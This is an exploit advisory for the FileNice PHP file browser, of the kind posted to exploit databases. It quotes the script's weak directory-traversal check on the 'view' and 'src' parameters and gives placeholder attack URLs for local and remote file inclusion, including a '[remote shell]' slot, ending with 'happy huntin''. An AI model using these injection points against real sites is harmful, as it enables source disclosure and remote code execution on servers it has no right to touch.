48 lines
No EOL
1.2 KiB
Text
48 lines
No EOL
1.2 KiB
Text
FileNice file browser RFI&LFI
|
|
|
|
|
|
By: e.wiZz!
|
|
|
|
#######Script site: http://filenice.com
|
|
|
|
|
|
|
|
|
|
In the wild...
|
|
|
|
###################################
|
|
|
|
######Vulnerability:
|
|
|
|
|
|
index.php
|
|
|
|
...
|
|
if(isset($_GET['view'])){
|
|
if(substr($_GET['view'],0,2) != ".." && substr($_GET['view'],0,1) != "/" && $_GET['view'] != "./" && !stristr($_GET['view'], '../')){
|
|
$out = new FNOutput;
|
|
$out->viewFile($_GET['view']);
|
|
}else{
|
|
// someone is poking around where they shouldn't be
|
|
echo("Don't hack my shit yo.");
|
|
exit;
|
|
}
|
|
}else if(isset($_GET['src'])){
|
|
if(substr($_GET['src'],0,2) != ".." && substr($_GET['src'],0,1) != "/" && $_GET['src'] != "./" && !stristr($_GET['src'], '../')){
|
|
$out = new FNOutput;
|
|
$out->showSource($_GET['src']);
|
|
}else{
|
|
// someone is poking around where they shouldn't be
|
|
echo("Don't hack my shit yo.");
|
|
exit;
|
|
}
|
|
|
|
...
|
|
|
|
here is some security check for dir-traversal(can be bypassed),but there is no check for RFI,
|
|
also you can see source of any file which is in parent directory:
|
|
|
|
http://inthewild/path/index.php?src=[lfi] // index.php or whatever
|
|
http://inthewild/path/index.php?src=[remote shell]
|
|
|
|
btw. there is lot of other vulnerabilities...happy huntin' :) |